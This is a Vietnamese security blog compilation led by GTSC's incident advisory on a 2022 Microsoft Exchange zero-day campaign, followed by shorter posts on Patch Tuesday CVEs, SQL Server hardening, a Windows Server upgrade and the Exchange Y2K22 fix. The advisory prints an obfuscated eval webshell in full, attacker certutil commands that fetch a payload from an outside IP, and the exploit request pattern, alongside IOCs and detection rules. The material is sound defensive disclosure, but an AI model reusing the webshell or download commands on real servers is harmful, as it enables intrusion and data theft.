CẢNH BÁO CHIẾN DỊCH TẤN CÔNG SỬ DỤNG LỖ HỔNG ZERO DAY TRÊN MICROSOFT EXCHANGE SERVER

Khoảng từ đầu tháng 08/2022, trong quá trình thực hiện giám sát an ninh mạng và xử lý sự cố, Trung tâm vận hành bảo mật GTSC SOC phát hiện một đơn vị trọng yếu bị tấn công an ninh mạng vào hệ thống ứng dụng Microsoft Exchange. Quá trình điều tra, đội ngũ chuyên gia BlueTeam xác định kẻ tấn công đã sử dụng một lỗ hổng bảo mật của Microsoft Exchange chưa từng được công bố – hay còn gọi là lỗ hổng 0-day. GTSC SOC Team ngay lập tức đưa ra phương án ngăn chặn tạm thời. Song song, các chuyên gia RedTeam cũng bắt tay ngay vào việc nghiên cứu, debug lại mã nguồn ứng dụng Mail Exchange để tìm ra mã khai thác (exploit). Với lỗ hổng bảo mật Exchange trước đây, đội ngũ RedTeam cũng đã từng phân tích ra exploit trước khi có exploit được public trên thế giới (1-day exploit) nên việc hiểu luồng, cơ chế xử lý của hệ thống Email Exchange đã giúp giảm thời gian cho quá trình research. Ngay sau khi nghiên cứu ra exploit, GTSC đã submit lên ZDI để làm việc với Microsoft nhằm nhanh chóng có bản vá.

Sau khi ZDI verify đã ghi nhận 2 bug liên quan đến exploit:

Tuy nhiên đến thời điểm hiện tại, GTSC ghi nhận thêm các đơn vị khác cũng đang gặp phải sự cố. Sau khi kiểm tra, GTSC xác nhận hệ thống bị tấn công qua lỗ hổng 0-day này. Để hỗ trợ cộng đồng ngăn chặn tạm thời trước khi có bản vá chính thức từ Microsoft, chúng tôi công bố bài viết này để cảnh báo tới các đơn vị có sử dụng hệ thống email Microsoft Exchange.

Thông tin lỗ hổng bảo mật 

                – Đội ngũ Blueteam trong quá trình giám sát phát hiện được các request exploit dựa trên log IIS có định dạng giống như lỗ hổng ProxyShell: autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com. Đồng thời kiểm tra các logs khác, nhận thấy kẻ tấn công thực hiện được các câu lệnh trên hệ thống. Kiểm tra version number trên máy chủ Exchange bị tấn công nhận thấy máy chủ đã cài đặt bản cập nhật mới nhất tại thời điểm đó nên không thể có trường hợp khai thác bởi lỗ hổng Proxyshell -> xác nhận máy chủ bị khai thác bởi lỗ hổng 0-day RCE mới. Các thông tin này được Blueteam cung cấp lại cho Redteam, từ đó đội ngũ Redteam của GTSC đã tiến hành nghiên cứu để trả lời cho các câu hỏi như tại sao các request lại giống với request của bug ProxyShell?, luồng RCE được thực hiện như thế nào? 

                – Kết quả nghiên cứu đã giúp GTSC Redteam thành công tìm ra cách sử dụng đường dẫn trên để truy cập tới 1 component ở backend và thực hiện RCE. Thông tin kỹ thuật chi tiết về lỗ hổng tại thời điểm này chúng tôi xin phép chưa công bố.

Các hành vi sau khai thác

Sau quá trình khai thác thành công lỗ hổng, chúng tôi ghi nhận các hành vi tấn công nhằm thu thập thông tin và tạo chỗ đứng trong hệ thống của nạn nhân. Nhóm tấn công cũng sử dụng các kỹ thuật khác nhau nhằm tạo backdoor trên hệ thống bị ảnh hưởng và thực hiện lateral movement sang các máy chủ khác trong hệ thống.

Webshell

Chúng tôi phát hiện các webshell được drop xuống các máy chủ exchange. Các webshell chúng tôi thu thập được hầu hết được obfuscated. Thông qua User-agent chúng tôi phát hiện attacker sử dụng Antsword (một opensource có tính năng hỗ trợ quản lý webshell).

<%@Page Language=”Jscript”%>

<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘NTcyM’+’jk3O3’+’ZhciB’+’zYWZl’+”+’P’+’S’+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘MQ==’))+char(51450/525)+”+”+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String(‘Wg==’))+’m’+”+’UiO2V’+’2YWwo’+’UmVxd’+’WVzdC’+’5JdGV’+’tWydF’+’WjBXS’+’WFtRG’+’Z6bU8’+’xajhk’+’J10sI’+’HNhZm’+’UpOzE’+’3MTY4’+’OTE7’+”)));%>

Chúng tôi nghi ngờ các hành vi khai thác này xuất phát từ các nhóm tấn công Trung Quốc, dựa trên codepage trong webshell là 936, một bảng mã ký tự Microsoft cho tiếng Trung giản thể (simplified Chinese).

Một đặc điểm đáng chú ý khác, bên cạnh việc drop các webshell mới hacker cũng thực hiện thay đổi nội dung trong file RedirSuiteServiceProxy.aspx thành nội dung webshell. RedirSuiteServiceProxy.aspx là một tên file hợp pháp sẵn có trong máy chủ Exchange

FileNamePath
RedirSuiteServiceProxy.aspxC:\ProgramFiles\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth
Xml.ashxC:\inetpub\wwwroot\aspnet_client
pxh4HG1v.ashxC:\ProgramFiles\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth

Trong quá trình xử lý sự cố tại một khách hàng khác, GTSC ghi nhận nhóm tấn công có sử dụng một mẫu webshell khác

Filename: errorEE.aspx

SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257

Ref: https://github.com/antonioCoco/SharPyShell

Command Execution

Bên cạnh các hành vi thu thập thông tin trên hệ thống, attacker thực hiện tải file và kiểm tra kết nối thông qua certutil có sẵn trên môi trường Windows

“cmd” /c cd /d “c:\\PerfLogs”&certutil.exe -urlcache -split -f http://206.188.196.77:8080/themes.aspx c:\perflogs\t&echo [S]&cd&echo [E]

“cmd” /c cd /d “c:\\PerfLogs”&certutil.exe -urlcache -split -f https://httpbin.org/get c:\test&echo [S]&cd&echo [E]

Ở cuối của mỗi câu lệnh mà kẻ tấn công thực hiện đều có chuỗi echo [S]&cd&echo [E], một trong những dấu hiệu nhận biết của China Chopper.

Ngoài ra, hacker cũng thực hiện inject DLL độc hại vào bộ nhớ, drop các file nghi ngờ lên các máy chủ bị tấn công, và thực thi các file này thông qua WMIC.

Suspicious File

Trên các máy chủ, chúng tôi phát hiện các file nghi ngờ có định dạng exe và dll

FileNamePath
DrSDKCaller.exeC:\root\DrSDKCaller.exe
all.exeC:\Users\Public\all.exe
dump.dllC:\Users\Public\dump.dll
ad.exeC:\Users\Public\ad.exe
gpg-error.exeC:\PerfLogs\gpg-error.exe
cm.exeC:\PerfLogs\cm.exe
msado32.tlbC:\Program Files\Common Files\system\ado\msado32.tlb

Trong số các file nghi ngờ trên, dựa vào các câu lệnh được thực hiện trên máy chủ, chúng tôi nhận định các file all.exe, dump.dll có nhiệm vụ trích xuất thông tin tài khoản trên hệ thống máy chủ. Sau các hành vi trích xuất thông tin tài khoản trên hệ thống, attacker sử dụng rar.exe để nén các file dump và copy ra webroot của máy chủ Exchange. Trong quá trình xử lý sự cố, các file trên đã không còn tồn tại trên hệ thống.

File cm.exe được drop xuống thư mục C:\PerfLogs\ là file cmd.exe

Malware Analysis

Thông tin DLL

File name: Dll.dll

Sha256:

074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82

45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9

9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0

29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3

c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2

Phân tích DLL

GTSC phân tích một mẫu cụ thể (074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82) để mô tả hành vi của mã độc, các mẫu DLL khác có nhiệm vụ và hành vi giống nhau, chỉ khác nhau về cấu hình listener

DLL gồm 2 hai class: Run và m. Bên trong mỗi class gọi tới các method thực hiện các nhiệm vụ khác nhau. Cụ thể:

Class Run thực hiện tạo listener lắng nghe các kết nối tới port 443, đường dẫn https://*:443/ews/web/webconfig/.

Sau quá trình lắng nghe, mã độc tạo thread mới goi tới r. Method r thực hiện:

–              Kiểm tra request nhận được có data trong body hay không. Nếu không có data đi kèm trong request gửi lên máy chủ, kết quả trả về là 404.

–              Ngược lại, nếu trong request có đi kèm data, DLL tiếp tục xử lý luồng bên trong nhánh IF:

Kiểm tra request nhận được có tồn tại “RPDbgEsJF9o8S=” hay không. Nếu có, gọi tới method i nằm trong class m để xử lý request nhận được. Kết quả trả về từ Run.m.i sẽ được covert sang chuỗi base64. Kết quả trả về cho client theo format

{

                “result”:1,

                “message”:”base64(aes(result))”

}

Class m

Method thực hiện:

–         Giải mã request nhận được bằng thuật toán AES với 16 bytes đầu tiên của request là giá trị IV, 16 bytes tiếp theo là giá trị key, các giá trị sau đó là data

–         Sau khi giải mã, lấy phần tử đầu tiên trong mảng làm flag để xử lý các case đã được định nghĩa

 Case 0: Gọi tới method info. Method này có nhiệm vụ thu thập thông tin hệ thống. Các thông tin bao như kiến trúc hệ điều hành, phiên bản framework, phiên bản hệ điều hành, v.v….GTSC mô phỏng lại case 0 bằng hình ảnh bên dưới. Request gửi lên theo format 16 bytes đầu là giá trị IV, 16 bytes tiếp theo là giá trị key, theo sau là flag để chỉ định option và phần còn lại là data.

base64 (IV | key | aes(flag|data))

Case 1: Gọi tới method sc. Method này có nhiệm vụ cấp phát vùng nhớ để thực thi shellcode

 Case 2: Gọi tới 2 method p và r. Method p xử lý các dữ liệu được ngăn cách bởi ký tự “|” lưu vào mảng array3. Mảng array3 sẽ lấy 2 phần tử đầu tiên làm tham số cho method r, method r có nhiệm vụ thực thi command

 Case 3: Gọi tới method ld. Method này có nhiệm vụ liệt kê thông tin thư mục và file theo format

D|-|<Ngày tạo> |<Ngày chỉnh sửa> |<tên thư mục hoặc tên file>

o   Case 4: Gọi tới method wf. Method này có nhiệm vụ ghi file

o   Case 5: Gọi tới method rf. Method này có nhiệm vụ đọc file

 Case 6: Tạo thư mục

o   Case 7: Xóa file hoặc thư mục

o   Case 8: Di chuyển File

o   Case 9: Set time cho file 

o   Case 10: Nạp và thực thi C# bytecode nhận từ request.

Các mẫu DLL khác có nhiệm vụ tương tự, chỉ khác nhau về cấu hình listener như sau:

                Victim 1:

https://*:443/ews/web/webconfig/

https://*:443/owa/auth/webcccsd/

https://*:444/ews/auto/

https://*:444/ews/web/api/

                Victim 2:

                                     http://*:80/owa/auth/Current/script/

https://*:443/owa/auth/Current/script/

Chúng tôi cũng phát hiện DLL được inject vào memory của tiến trình svchost.exe. DLL thực hiện kết nối gửi nhận dữ liệu tới địa chỉ 137[.]184[.]67[.]33 được config trong binary. Việc gửi nhận dữ liệu với C2 sử dụng thuật toán RC4, khóa sẽ được tạo trong thời gian chạy (runtime).

Các biện pháp ngăn chặn tạm thời

Quá trình xử lý sự cố trực tiếp của GTSC ghi nhận có trên 1 đơn vị tổ chức bị là nạn nhân của chiến dịch tấn công khai thác lỗ hổng zero day. Ngoài ra chúng tôi cũng lo ngại rằng có thể có nhiều tổ chức khác cũng đã bị khai thác nhưng chưa được phát hiện. Trong thời gian chờ đợi bản vá chính thức từ hãng, GTSC cung cấp biện pháp khắc phục tạm thời nhằm giảm thiểu việc tấn công khai thác lổ hổng bằng cách bổ sung rule chặn các request có dấu hiệu tấn công thông qua module URL Rewrite rule trên máy chủ IIS (Webserver)

– Trong Autodiscover tại FrontEnd chọn tab URL Rewrite chọn Request Blocking

– Add thêm chuỗi “.*autodiscover\.json.*\@.*Powershell.*“ vào Pattern (URL Path):   

– Condition input: lựa chọn {REQUEST_URI}

Phát hiện tấn công

Nhằm kiểm tra hệ thống đã bị tấn công bởi lổ hỗng này, các đơn vị/tổ chức có thể thực hiện theo các cách thức sau:

Cách 1: Sử dụng powershell với câu lệnh sau: (Sử dụng powershell để thực hiện search trên toàn bộ folder log IIS mất khá nhiều thời gian)

Get-ChildItem -Recurse -Path <Path_IIS_Logs> -Filter “*.log” | Select-String -Pattern ‘powershell.*autodiscover\.json.*\@.*200

Cấu hình mặc định IIS log nằm tại đường dẫn “%SystemDrive%\inetpub\logs\LogFiles”

Cách 2: Sử dụng công cụ do GTSC phát triển dựa trên dấu hiệu khai thác lỗ hổng, thời gian thực hiện search nhanh hơn so với việc sử dụng powershell. Đường dẫn tải về công cụ: https://github.com/ncsgroupvn/NCSE0Scanner

Cách 3: Sử dụng công cụ của MS luôn nhé Exchange On-premises Mitigation Tool v2 (EOMTv2) link download tại đây

Indicators of Compromise (IOCs)

Webshell:

File Name: pxh4HG1v.ashx

                Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1

                Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\pxh4HG1v.ashx

File Name: RedirSuiteServiceProxy.aspx

                Hash (SHA256): 65a002fe655dc1751add167cf00adf284c080ab2e97cd386881518d3a31d27f5

                Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

File Name: RedirSuiteServiceProxy.aspx

                Hash (SHA256): b5038f1912e7253c7747d2f0fa5310ee8319288f818392298fd92009926268ca

                Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\RedirSuiteServiceProxy.aspx

File Name: Xml.ashx

                Hash (SHA256): c838e77afe750d713e67ffeb4ec1b82ee9066cbe21f11181fd34429f70831ec1

                Path: C:\inetpub\wwwroot\aspnet_client\Xml.ashx

Filename: errorEE.aspx

SHA256: be07bd9310d7a487ca2f49bcdaafb9513c0c8f99921fdf79a05eaba25b52d257

Path: C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\errorEE.aspx

DLL

File name: Dll.dll

SHA256:

074eb0e75bb2d8f59f1fd571a8c5b76f9c899834893da6f7591b68531f2b5d82

45c8233236a69a081ee390d4faa253177180b2bd45d8ed08369e07429ffbe0a9

9ceca98c2b24ee30d64184d9d2470f6f2509ed914dafb87604123057a14c57c0

29b75f0db3006440651c6342dc3c0672210cfb339141c75e12f6c84d990931c3

c8c907a67955bcdf07dd11d35f2a23498fb5ffe5c6b5d7f36870cf07da47bff2

File name: 180000000.dll (Dump từ tiến trình Svchost.exe)

SHA256: 76a2f2644cb372f540e179ca2baa110b71de3370bb560aca65dcddbd7da3701e

IP

125[.]212[.]220[.]48

5[.]180[.]61[.]17

47[.]242[.]39[.]92

61[.]244[.]94[.]85

86[.]48[.]6[.]69

86[.]48[.]12[.]64

94[.]140[.]8[.]48

94[.]140[.]8[.]113

103[.]9[.]76[.]208

103[.]9[.]76[.]211

104[.]244[.]79[.]6

112[.]118[.]48[.]186

122[.]155[.]174[.]188

125[.]212[.]241[.]134

185[.]220[.]101[.]182

194[.]150[.]167[.]88

212[.]119[.]34[.]11

URL:

hxxp://206[.]188[.]196[.]77:8080/themes.aspx

C2:

137[.]184[.]67[.]33

Mitre ATT&CK Mapping

TaticIDName
Resource DevelopmentT1586.002Compromise Accounts: Email Accounts
ExecutionT1059.003Command and Scripting Interpreter: Windows Command Shell
ExecutionT1047Windows Management Instrumentation
PersistenceT1505.003Server Software Component: Web Shell
Defense EvasionT1070.004Indicator Removal on Host: File Deletion
Defense EvasionT1036.005Masquerading: Match Legitimate Name or Location
Defense EvasionT1620Reflective Code Loading
Credential AccessT1003.001OS Credential Dumping: LSASS Memory
DiscoveryT1087Account Discovery
DiscoveryT1083File and Directory Discovery
DiscoveryT1057Process Discovery
DiscoveryT1049System Network Connections Discovery
Lateral MovementT1570Lateral Tool Transfer
CollectionT1560.001Archive Collected Data: Archive via Utility

28/09/2022 

GTSC SECURITY TEAM

Link: https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html

Microsoft vá 63 lỗ hổng bảo mật Windows

Trong bản cập nhật Patch Tuesday tháng 9, Microsoft phát hành bản vá cho tổng cộng 63 lỗ hổng trên Windows.

Theo Microsoft, 5 trong số 63 lỗ hổng được xếp loại “nghiêm trọng” do kẻ xấu có thể lợi dụng để thực thi mã từ xa. Đây là một trong những loại lỗ hổng nguy hiểm nhất. Patch Tuesday tháng 9 vá 2 lỗ hổng zero-day đã được công bố, trong đó có 1 lỗ hổng đang được khai thác trong thực tế.

Microsoft phân loại một lỗ hổng là zero-day nếu nó đã được công bố hoặc được khai thác mà chưa có bản vá. Lỗ hổng zero-day được vá hôm nay là “CVE-2022-37969”. Nếu khai thác thành công, thủ phạm có thể chiếm được các đặc quyền hệ thống. Nó được các nhà nghiên cứu tại DBAPPSecurity, Mandiant, CrowdStrike và Zscaler phát hiện. Theo Dhanesh Kizhakkinan – Kỹ sư lỗ hổng cấp cao của Mandiant, dường như lỗ hổng nằm riêng lẻ và không thuộc một chuỗi.

“CVE-2022-37969” ảnh hưởng đến các phiên bản Windows từ 7 đến 11, cũng như Windows Servers 2008 và 2012. Chuyên gia bảo mật Mike Walters của Action1 cho biết, do lỗ hổng có độ phức tạp thấp và không cần tương tác của người dùng, nó có thể sớm bị giới hacker khai thác.

Theo Microsoft, lỗ hổng yêu cầu kẻ tấn công phải xâm nhập được vào thiết bị bị xâm phạm hoặc có khả năng khởi chạy mã trên hệ thống mục tiêu. Dustin Childs, Giám đốc tình báo nguy cơ tại Zero Day Initiative, chia sẻ thêm, các loại lỗ hổng này thường được sử dụng trong các hình thức tấn công social engineering như thuyết phục ai đó mở một tập tin hay bấm vào liên kết. Sau khi nạn nhân làm theo, mã bổ sung sẽ dùng đặc quyền leo thang để chiếm đoạt hệ thống.

Người dùng được khuyến nghị nên cập nhật bảo mật ngay khi có thể. Windows 7 cũng được nhận bản vá bảo mật dù đã bị hết hạn hỗ trợ vào năm 2020.

Nguồn  (Theo Bleeping Computer, Forbes)

Thông tin cảnh báo 7 lỗ hổng bảo mật mới của Microsoft CVE-2022-26809

Tổng quan:

Cảnh báo nhanh về lỗ hổng 0day CVE-2022-26809, Lỗ hổng thực thi mã từ xa trong Windows RPC Runtime không cần xác thực đang bị khai thác trong tự nhiên. Lỗ hổng chưa có nhiều thông tin đánh giá và phân tích chi tiết hay PoC được công bố. Tuy vậy cũng cần nắm bắt đề phòng, kịp thời phản ứng. Ngoài ra cũng cập nhật thêm thông tin một số lỗ hổng cần chú ý trong bản vá tháng 4 của Microsoft.

Phạm vi ảnh hưởng/Điều kiện khai thác ( CVE-2022-26809 ):

 • Hệ thống mở port 445 ra ngoài internet đều dễ bị tấn công
 • Các phiên bản Windows chưa được cập nhật bản vá tháng 4 mới nhất đều bị ảnh hưởng
 • Không cần thông tin xác thực

Thông tin chi tiết:

 1. CVE-2022-26809: Windows RPC Runtime RCE không cần xác thực

Lỗ hổng nằm trong thư viện rpcrt4.dll của Windows RPC Runtime. Hai function là OSF_CCALL::ProcessResponse and OSF_SCALL::ProcessReceivedPDU đảm nhận việc xử lý các gói tin RPC ở phía client (CCALL) và server (SCALL).

Trong đó tại hàm QUEUE :: PutOnQueue thuộc OSF_SCALL ::

ProcessReceivePDU có chức năng kiểm tra việc tràn số nguyên ( integer overflows

check ).

	int64 	fastcall sub_l80042028(unsigned int currentvalue, int addition, int *output) {
unsigned int afterAddition; // eax
int v4; // edx
	int64 result; // rax
afterAddition = currentvalue + addition;
v4 = -1;
if ( afterAddition >= currentvalue )
v4 = afterAddition;
result = afterAddition < currentvalue ? 0x80070216 : 0;
’output = v4;
return result;
}

Tại OSF_SCALL:GetCoalescedBuffer việc tràn số nguyên này có thể gây lỗi heap buffer overflow từ đó có thể ghi ngoài giới hạn bộ đệm heap và thực thi mã tùy ý. Một số hàm khác cũng tương tự bao gồm:

 • OSF_CCALL::ProcessResponse
 • OSF_SCALL::GetCoalescedBuffer
 • OSF_CCALL::GetCoalescedBuffer
 1. Một số lỗ hổng cần quan tâm trong Patch Tuesday tháng 4 của Microsoft

Trong tháng 04/2022, Microsoft đã phát hành bản vá cho 117 lỗ hổng (chưa bao gồm 17 lỗ hổng trong Microsoft Edge), trong đó có 9 lỗ hổng được đánh giá ở mức Nghiêm Trọng và 108 lỗ hổng được đánh giá là Quan Trọng. Tỉ trọng số lượng lỗ hổng như sau: Thực thi mã từ xa (RCE) và Leo thang đặc quyền (EoP) đều chiếm tỉ trọng lớn với 39,3%. Trong các lỗ hổng được vá lần này, cần lưu ý một số CVE được Microsoft đánh giá là nguy hiểm, có khả năng bị tấn công cao trong thực tế:

CVE

Lỗ hổng

CVSS

Mô tả

CVE-2022-

26809

RPC Runtime Library Remote Code

9.8

Lỗ hổng thực thi mã từ xa trong RPC Runtime Library. Chưa có thông tin chi

 

Execution Vulnerability

 

tiết và PoC liên quan đến lỗ hổng trên không gian mạng.

CVE-2022- 24491/24497

Windows Network File System Remote Code Execution Vulnerability

9.8

Lỗ hổng thực thi mã từ xa trong Windows Network File System. Chưa có thông tin chi tiết và PoC liên quan đến lỗ hổng trên không gian mạng.

CVE-2022-

26815

Windows DNS Server Remote Code Execution Vulnerability

7.2

Lỗ hổng thực thi mã từ xa trong Windows DNS Server. Chưa có thông tin chi tiết và PoC liên quan đến lỗ hổng trên không gian mạng.

CVE-2022-

26904

Windows User Profile Service Elevation of

Privilege Vulnerability

7.0

Lỗ hổng leo thang đặc quyền trong Windows User Profile Service. Lỗ hổng đã có PoC công bố trên không gian mạng.

CVE-2022-

24521

Windows Common Log File System Driver Elevation of Privilege

Vulnerability

7.8

Lỗ hổng leo thang đặc quyền trong Windows Common Log File System Driver. Lỗ hổng chưa có thông tin chi tiết và PoC công bố trên không gian mạng. Tuy nhiên, lỗ hổng đã được khai thác trong thực tế.

Cách phòng tránh/fix lỗi/phát hiện:

 1. Lỗ hổng không có dấu hiệu nhận biết cụ thể. Chặn hoặc hạn chế kết nối từ port 445 từ ngoài mạng internet/mạng không phải kết nối trust. Áp dụng khuyến nghị bảo mật giao thức SMB theo nhà phát triển tại :

https://docs.microsoft.com/en-us/windows-server/storage/file-server/smb-secure-traffic

 1. Đề nghị cập nhật bản vá theo đường dẫn phù hợp với từng sản phẩm tại:

https://msrc.microsoft.com/update-guide/releaseNote/2022-Apr

Hoặc theo các CVE khuyến cáo như sau:

CVE

Bản vá

CVE-2022-26809

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26809

CVE-2022- 24491/24497

https://msrc.microsoft.com/update-guide/en- US/vulnerability/CVE-2022-24491 https://msrc.microsoft.com/update-guide/en- US/vulnerability/CVE-2022-24497

CVE-2022-26815

https://msrc.microsoft.com/update-guide/en- US/vulnerability/CVE-2022-26815

CVE-2022-26904

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26904

CVE-2022-24521

https://msrc.microsoft.com/update-guide/en- US/vulnerability/CVE-2022-24521

Phương Nguyễn

Chia sẽ 1 số cách bảo mật SQL Server

Có thể là hình ảnh về văn bản

Sáng nay có bạn alo hỏi vụ sql tấn công và ăn cua…
Tình hình có vẻ căng vụ publishing port SQL Server 1433 nhất là thuê hosting vps.
Một số ý khuyến cáo chia sẽ ae bảo mật Server SQL:
1/ Buộc phải có tường lửa nếu thuê hosting thì cũng nên thuê thêm. Còn túng quá change port SQL.
2/ Access policy cho 1 số dịch vụ out in.
3/ Change mật khẩu quản trị sa mức độ phức tạp tránh bị bruce force.
4/ Phân quyền user logon và user ower db cần thiết. Không sử dụng quyền sa hoặc system admin roles để chạy user databases.
5/ Bảo mật chính application các bạn đang chạy như password admin root hay tài khoản có quyền admin…
6/ Update path KB mới nhất MSSQL.
7/ Update Os Windows Server mới nhất.
8/ Cài đặt antivirus và update mới nhất bật ips nếu có ví dụ SEP, Kis, mcafee….
9/ Công tác này rất quan trọng là rà soát backup 3-2-1 tốt nhất backup lên đám mây và sử dụng VPN tránh bị ăn ransomware…
Những ai đang chạy public trực tiếp xem xét khoá lại. Bài viết không nói rõ ứng dụng đích danh nào mà nói chung cho tất cả ứng dụng sử dụng SQL làm CSDL.
Nghe đâu SQL server đang bị dính Cobalt Strike.

#jsisen#phuongit#sqlserver#CobaltStrike#warning#cve202226809

Vui lòng ghi rõ nguồn nếu copy

Phương Nguyễn

HƯỚNG DẪN CẬP NHẬT IN-PLACE WINDOWS SERVER 2019 LÊN WINDOWS SERVER 2022

Mô tả

Cập nhật Windows Server 2016/20219 tại chổ in-place lên Windows server 2022

Chuẩn bị

Source ISO Windows Server 2022

Update Windows server full các bản vá mới nhất.

3/ Tiến hành cập nhật in-place

Mount ISO

Chọn Desktop

Sau khi udpate khoản thời gian 15-30 tùy theo dung lượng và dịch vụ của Windows server

Lưu ý trước khi phải backup full VM nêu máy ảo, backup full dịch vụ ứng dụng db bên trong.

Phương Nguyễn

Chúc các bạn thành công

Bản vá cập nhật KB5009624 Microsoft Lỗi nhiều dịch vụ VM Hyper-V, Boot Loop, DC Treo

Tạm thời disable dịch vụ Windows Update hết các Windows server nhé.
Microsoft không ngừng ra các bản phá nhằm bản vá
Lỗi liên tục có thể mô tả bên dưới:
Windows 10 KB5009543: Lỗi VPN L2TP
Windows 10 KB5008212: Lỗi liên quan Outlook
Windows Server 2012 R2 KB5009624:
+Lỗi liên quan Domain Controller do lsass.exe, wininit.exe, Lỗi này tránh rollback liên quan USN AD

 • Lỗi liên quan đến dịch vụ Hyper-V không start được VM, Lỗi VM Gen 2 (UEFI) tronge Hyper-V không start,
 • Lỗi liên quan Clustering CSV.
  KB5009586
  Windows Server 2012 R2 KB5009595, Windows Server 2019 KB5009557 Windows Server 2022 KB5009555 : Lỗi liên quan đến dịch vụ DNS không start được.
  Windows Server 2012 R2 KB5009595, Windows Server 2019 KB5009557 Windows Server 2022 KB5009555: Lỗi liên quan đến định dạng disk ReFS trạng thái RAW.

Các ae cẩn thận nhé.

jsisen

phuongit

bugmicrosoft

Cập nhật bản vá xử lý FIP-FS Lỗi liên quan Y2K22 treo Email Queues khi Update Antimalware

Microsoft_Exchange_(2019-present).svg

Mô tả

Theo như bài viết ngày 01/01/2022 thông báo lỗi quan trọng lỗi liên Exchange không gửi/nhận được liên quan Y2K22 tại đây

Mới đây sau khi report 02/01/2022 các anh em kêu gào trên thế giới vì lỗi liên quan sản phẩm Exchange 2016, Exchange 2019. Microsoft đã xác nhận đây là lỗi Y2K22.

Microsoft đã tạo một giải pháp để giải quyết vấn đề thư bị kẹt trong hàng đợi truyền tải trên Exchange Server 2016 và Exchange Server 2019 do sự cố ngày tiềm ẩn trong tệp chữ ký được công cụ quét phần mềm độc hại trong Exchange Server sử dụng.

Log Name: Application 
Source: FIPFS 
Logged: 1/1/2022 1:03:42 AM 
Event ID: 5300 
Level: Error 
Computer: NVPSRVEX01.viettechgroup.lab
Description: The FIP-FS "Microsoft" Scan Engine failed to load. PID: 23092, Error Code: 0x80004005. Error Description: Can't convert "2201010001" to long.
Log Name: Application 
Source: FIPFS 
Logged: 1/1/2022 11:47:16 AM 
Event ID: 1106 
Level: Error 
Computer: NVPSRVEX01.viettechgroup.lab
Description: The FIP-FS Scan Process failed initialization. Error: 0x80004005. Error Details: Unspecified error.

Nguyên Nhân

FIP-FS sử dụng kiểu “Int32” để lưu giá trị của các biến số thời gian. Giá trị tối đa mà kiểu này có thể lưu là “2.147.483.647”.

Tuy nhiên, các ngày trong năm 2022 có giá trị tối thiểu là 2.201.010.001 hoặc lớn hơn giá trị tối đa có thể được lưu trữ trong biến int32 đã ký, khiến FIP-FS “Microsoft” Scan Engine  thất bại và không phát hành thư để gửi nên bị giữ.

Xử lý Cập nhật

Cách 1 cập nhật tự động

Microsoft đã cập nhật 1 script tự động ResetscanengineVersion. Lưu ý trong hệ thống có bao nhiêu máy chủ Exchange thì chạy hết tất cả để cập nhật nhé.

Tải script bên dưới:

https://aka.ms/ResetScanEngineVersion

Lưu trước khi chạy nếu chưa có quyền thực thi Powershell thì chạy lệnh bên dưới:

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned

Thực hiện update như sau, nếu các bạn nào đã disabled hoặc bypassed antimalware scanning thì phải bật lại trước khi làm thao tác Update này nhé.

[PS] C:\Program Files\Microsoft\Exchange Server\V15\Scripts>.\Enable-AntiMalwareScanning.ps1
[PS] C:\Program Files\Microsoft\Exchange Server\V15\Scripts> Set-MalwareFilteringServer -BypassFiltering $false -identity Servermbx

Run EMS Administrators trên tất cả Exchange Server chúng ta đang có nhé.

.\Reset-ScanEngineVersion.ps1

[PS] D:\Y2K22>.\Reset-ScanEngineVersion.ps1
NVPSRVEX01 Stopping services...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
WARNING: Waiting for service 'Microsoft Filtering Management Service (FMS)' to stop...
